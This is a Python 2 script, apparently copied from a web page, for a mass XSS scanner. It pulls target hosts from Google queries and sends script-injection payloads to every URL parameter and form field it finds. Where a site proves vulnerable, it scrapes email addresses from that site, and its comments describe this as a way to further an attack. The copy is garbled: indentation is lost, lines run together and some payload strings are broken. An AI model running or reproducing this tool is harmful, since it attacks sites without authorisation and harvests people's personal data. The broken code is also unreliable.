[cc lang=”python”]#!/usr/bin/python
#XSS Scanner that can find hosts using a google query or search one site.
#If XSS is found it attempts to collect email addresses to further your attack
#or warn the target of the flaw. When the scan is complete
#it will print out the XSS’s found and or write to file, it will find false positives
#so manually check before getting to excited. It also has verbose mode and
#you can change the alert pop-up message, check options!!
#
##Changelog v1.1: added options, verbose, write to file, change alert
#Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback
#Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed #some user input problems, exiting without error messages with Ctrl-C (KeyboardInterrupt)
#
#d3hydr8[at]gmail[dot]com

import sys, urllib2, re, sets, random, httplib, time, socket

def title():
print “nt d3hydr8[at]gmail[dot]com XSS Scanner v1.3”
print “t———————————————–”

def usage():
title()
print “n Usage: python XSSscan.py

def StripTags(text):
finished = 0
while not finished:
finished = 1
start = text.find(“<") if start >= 0:
stop = text[start:].find(“>”)
if stop >= 0:
text = text[:start] + text[start+stop+1:]
finished = 0
return text

def timer():
now = time.localtime(time.time())
return time.asctime(now)

def geturls(query):

counter = 10
urls = []

while counter < int(sys.argv[3]): url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N' opener = urllib2.build_opener(url) opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')] data = opener.open(url).read() hosts = re.findall(('w+.[w.-/]*.w+'),StripTags(data)) #Lets add sites found to a list if not already or a google site. #We don't want to upset the people that got our list for us. for x in hosts: if x.find('www') != -1: x = x[x.find('www'):] if x not in urls and re.search("google", x) == None: urls.append(x) counter += 10 return urls def getemails(site): try: if site.split("/",1)[0] not in done: print "t[+] Collecting Emails:",site.split("/",1)[0] webpage = urllib2.urlopen(proto+"://"+site.split("/",1)[0], port).read() emails = re.findall('[w.-]+@[w.-]+.www', webpage) done.append(site.split("/",1)[0]) if emails: return emails except(KeyboardInterrupt): print "n[-] Cancelled -",timer(),"n" sys.exit(1) except(IndexError): pass def getvar(site): names = [] actions = [] print "n","-"*45 print "[+] Searching:",site try: webpage = urllib2.urlopen(proto+"://"+site, port).read() emails = re.findall('[w.-]+@[w.-]+.www', webpage) var = re.findall("?[w.-/]*=",webpage) if len(var) >=1:
var = list(sets.Set(var))
found_action = re.findall(“action=”[w.-/]*””, webpage.lower())
found_action = list(sets.Set(found_action))
if len(found_action) >= 1:
for a in found_action:
a = a.split(‘”‘,2)[1]
try:
if a[0] != “/”:
a = “/”+a
except(IndexError):
pass
actions.append(a)
found_names = re.findall(“name=”[w.-/]*””, webpage.lower())
found_names = list(sets.Set(found_names))
for n in found_names:
names.append(n.split(‘”‘,2)[1])
print “[+] Variables:”,len(var),”| Actions:”,len(actions),”| Fields:”,len(names)
print “[+] Avg Requests:”,(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))*len(xss_payloads)
if len(var) >= 1:
for v in var:
if site.count(“/”) >= 2:
for x in xrange(site.count(“/”)):
for xss in xss_payloads:
tester(site.rsplit(‘/’,x+1)[0]+”/”+v+xss)
for xss in xss_payloads:
tester(site+”/”+v+xss)

if len(names) >= 1:
for n in names:
if site.count(“/”) >= 2:
for x in xrange(site.count(“/”)):
for xss in xss_payloads:
tester(site.rsplit(‘/’,x+1)[0]+”/”+”?”+n+”=”+xss)
for xss in xss_payloads:
tester(site+”/”+”?”+n+”=”+xss)

if len(actions) != 0 and len(names) >= 1:
for a in actions:
for n in names:
if site.count(“/”) >= 2:
for x in xrange(site.count(“/”)):
for xss in xss_payloads:
tester(site.rsplit(‘/’,x+1)[0]+a+”?”+n+”=”+xss)
#tester(site.split(“/”)[0]+a+”?”+n+”=”+xss)

if len(actions) != 0 and len(var) >= 1:
for a in actions:
for v in var:
if site.count(“/”) >= 2:
for x in xrange(site.count(“/”)):
for xss in xss_payloads:
tester(site.rsplit(‘/’,x+1)[0]+a+v+xss)
else:
for xss in xss_payloads:
tester(site.split(“/”)[0]+a+v+xss)
if sys.argv[1].lower() == “-g” or sys.argv[1].lower() == “-google”:
urls.remove(site)

except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror):
if sys.argv[1].lower() == “-g” or sys.argv[1].lower() == “-google”:
urls.remove(site)
pass
except(KeyboardInterrupt):
print “n[-] Cancelled -“,timer(),”n”
sys.exit(1)

def tester(target):

if verbose ==1:
if message != “”:
print “Target:”,target.replace(alert ,message)
else:
print “Target:”,target

try:
source = urllib2.urlopen(proto+”://”+target, port).read()
h = httplib.HTTPConnection(target.split(‘/’)[0], int(port))
try:
h.request(“GET”, “/”+target.split(‘/’,1)[1])
except(IndexError):
h.request(“GET”, “/”)
r1 = h.getresponse()
if verbose ==1:
print “t[+] Response:”,r1.status, r1.reason
if re.search(alert.replace(“%2D”,”-“), source) != None and r1.status not in range(303, 418):
if target not in found_xss:
if message != “”:
print “n[!] XSS:”, target.replace(alert ,message)
else:
print “n[!] XSS:”, target
print “t[+] Response:”,r1.status, r1.reason
emails = getemails(target)
if emails:
print “t[+] Email:”,len(emails),”addressesn”
found_xss.setdefault(target, list(sets.Set(emails)))
else:
found_xss[target] = “None”
except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL):
pass
except(KeyboardInterrupt):
print “n[-] Cancelled -“,timer(),”n”
sys.exit(1)
except():
pass

if len(sys.argv) <= 2: usage() sys.exit(1) for arg in sys.argv[1:]: if arg.lower() == "-v" or arg.lower() == "-verbose": verbose = 1 if arg.lower() == "-w" or arg.lower() == "-write": txt = sys.argv[int(sys.argv[1:].index(arg))+2] if arg.lower() == "-a" or arg.lower() == "-alert": message = re.sub("s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2]) title() socket.setdefaulttimeout(3) found_xss = {} done = [] count = 0 proto = "http" alert = "D3HYDR8%2D0wNz%2DY0U" print "n[+] XSS_scan Loaded" try: if verbose ==1: print "[+] Verbose Mode On" except(NameError): verbose = 0 print "[-] Verbose Mode Off" try: if message: print "[+] Alert:",message except(NameError): print "[+] Alert:",alert message = "" pass xss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E", "%22%3E“,
“%22%3E“,
“”;!–“<%27"+alert+"%27>=&{()}”,
“‘;alert(0)//’;alert(1)//%22;alert(2)//%22;alert(3)//–%3E%3C/SCRIPT%3E%22%3E’%3E%3CSCRIPT%3Ealert(%27″+alert+”%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function”,
“]
try:
if txt:
print “[+] File:”,txt
except(NameError):
txt = None
pass
print “[+] XSS Payloads:”,len(xss_payloads)
if sys.argv[1].lower() == “-g” or sys.argv[1].lower() == “-google”:
try:
if sys.argv[3].isdigit() == False:
print “n[-] Argument [“,sys.argv[3],”] must be a number.n”
sys.exit(1)
else:
if int(sys.argv[3]) <= 10: print "n[-] Argument [",sys.argv[3],"] must be greater than 10.n" sys.exit(1) except(IndexError): print "n[-] Need number of hosts to collect.n" sys.exit(1) query = re.sub("s","+",sys.argv[2]) port = "80" print "[+] Query:",query print "[+] Querying Google..." urls = geturls(query) print "[+] Collected:",len(urls),"hosts" print "[+] Started:",timer() print "n[-] Cancel: Press Ctrl-C" time.sleep(3) while len(urls) > 0:
print “-“*45
print “n[-] Length:”,len(urls),”remain”
getvar(random.choice(urls))
if sys.argv[1].lower() == “-s” or sys.argv[1].lower() == “-site”:
site = sys.argv[2]
try:
if sys.argv[3].isdigit() == False:
port = “80”
else:
port = sys.argv[3]
except(IndexError):
port = “80”
print “[+] Site:”,site
print “[+] Port:”,port
if site[:7] == “http://”:
site = site.replace(“http://”,””)
if site[:8] == “https://”:
proto = “https”
if port == “80”:
print “[!] Using port 80 with https? (443)”
site = site.replace(“https://”,””)
print “[+] Started:”,timer()
print “n[-] Cancel: Press Ctrl-C”
time.sleep(4)
getvar(site)

print “-“*65
print “nn[+] Potential XSS found:”,len(found_xss),”n”
time.sleep(3)
if txt != None and len(found_xss) >=1:
xss_file = open(txt, “a”)
xss_file.writelines(“ntd3hydr8[at]gmail[dot]com XSS Scanner v1.3n”)
xss_file.writelines(“t——————————————nn”)
print “[+] Writing Data:”,txt
else:
print “[-] No data written to disk”
for k in found_xss.keys():
count+=1
if txt != None:
if message != “”:
xss_file.writelines(“[“+str(count)+”] “+k.replace(alert ,message)+”n”)
else:
xss_file.writelines(“[“+str(count)+”] “+k+”n”)
if message != “”:
print “n[“+str(count)+”]”,k.replace(alert ,message)
else:
print “n[“+str(count)+”]”,k
addrs = found_xss[k]
if addrs != “None”:
print “t[+] Email addresses:”
for addr in addrs:
if txt != None:
xss_file.writelines(“tEmail: “+addr+”n”)
print “t -“,addr
print “n[-] Done -“,timer(),”n”[/cc]